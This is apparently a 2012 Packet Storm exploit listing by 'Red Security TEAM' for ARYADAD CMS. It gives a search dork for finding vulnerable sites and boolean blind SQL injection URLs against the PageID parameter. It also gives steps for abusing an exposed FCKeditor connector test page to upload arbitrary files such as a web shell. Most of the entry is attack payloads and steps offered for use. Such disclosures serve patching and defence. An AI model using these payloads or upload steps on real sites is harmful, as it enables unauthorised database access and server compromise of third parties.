ARYADAD SQL Injection / Shell Upload

2012-01-21T00:00:00
ID PACKETSTORM:108907
Type packetstorm
Reporter Red Security TEAM
Modified 2012-01-21T00:00:00

Description

                                        
                                            `#   
# Title : ARYADAD Multi Vulnerability  
# Author : Red Security TEAM  
# Date : 21/01/2012  
# Vendor : http://cms.aryadad.com/  
# Tested On : Windows Server 2008 (IIS 7.5)  
# Dork : Powered by ARYADAD Corporation  
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM  
# Home : http://RedSecurity.COM  
#  
# Exploit :  
#   
# I : Blind SQL Injection Vulnerability  
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0  
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0  
#  
# II : File Upload Vulnerability  
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html  
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/  
#  
`